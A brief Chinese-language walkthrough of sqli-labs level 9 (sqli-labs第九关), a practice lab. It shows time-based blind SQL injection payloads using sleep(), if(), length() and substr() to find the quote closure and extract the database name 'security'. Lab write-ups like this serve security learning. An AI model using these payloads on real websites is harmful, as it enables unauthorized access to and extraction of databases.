sqli-labs第九关
1、首先我们发现无论我们输入什么,页面都返回同一个页面,所以我们猜测此处需要适用时间盲注
2、输入?id=1' and sleep(3)--+来判断闭合符号,有延迟就说明是此闭合符号,经实验可知闭合符号为单引号’
3、判断数据库名长度?id=1' and if((length(database())=1),sleep(3),1)--+,若匹配则页面返回会产生延迟,爆破得长度为8
4、猜解数据库名:?id=1' and if((substr(database(),1,1)="a"),sleep(3),1)--+,爆破得数据库名为security
5、后面的步骤同布尔盲注,依次猜解数据,就不再赘述了